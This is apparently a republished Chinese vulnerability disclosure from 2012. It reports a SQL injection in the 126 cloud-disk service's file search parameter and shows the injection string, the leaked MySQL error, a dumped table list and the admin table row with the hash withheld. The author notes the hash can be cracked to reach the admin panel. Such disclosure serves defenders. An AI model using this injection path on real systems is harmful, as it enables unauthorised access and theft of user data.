126网盘SQL注射漏洞造成后台沦陷_软件资讯_风信网

漏洞标题: 126网盘注射,沦陷后台,用户敏感信息泄露
相关厂商: 126网盘
漏洞作者: Night
提交时间: 2012-10-16
公开时间: 2012-11-30
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞详情

披露状态:

2012-10-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-11-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:
126网盘爆搜索型注册

详细说明:
注射地址:?key=A'

前位置:文件搜索 -> A'文件分类文件名称扩展大小上传时间You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and shenhe<5 and gongxiang='0' and list_d>0 and list_x>0' at line 1

漏洞证明:

Database: 126disk
[24 tables]
+------------------+
| disk_admin       |
| disk_adminlog    |
| disk_adminmsg    |
| disk_collection  |
| disk_count       |
| disk_file        |
| disk_gonggao     |
| disk_guolv       |
| disk_haoyou      |
| disk_integral    |
| disk_integrallog |
| disk_jubao       |
| disk_link        |
| disk_links       |
| disk_message     |
| disk_mulu        |
| disk_search      |
| disk_server      |
| disk_tag         |
| disk_type        |
| disk_user        |
| disk_userlog     |
| disk_visitors    |
| disk_zhuanji     |
+------------------+

Database: 126disk
Table: disk_admin
[1 entry]
+----+-------+----------------------------------+-------+
| id | login | pass                             | user  |
+----+-------+----------------------------------+-------+
| 1  | 9     | [md5密码就不放出来了] | admin |
+----+-------+----------------------------------+-------+

密码可以反解的,直接登陆后台看看。

126网盘SQL注射漏洞造成后台沦陷_软件资讯_风信网

126网盘SQL注射漏洞造成后台沦陷_软件资讯_风信网

126网盘SQL注射漏洞造成后台沦陷_软件资讯_风信网

测试到这里为止了,相信一个网盘系统拿shell还是很简单的

修复方案:
你们的专业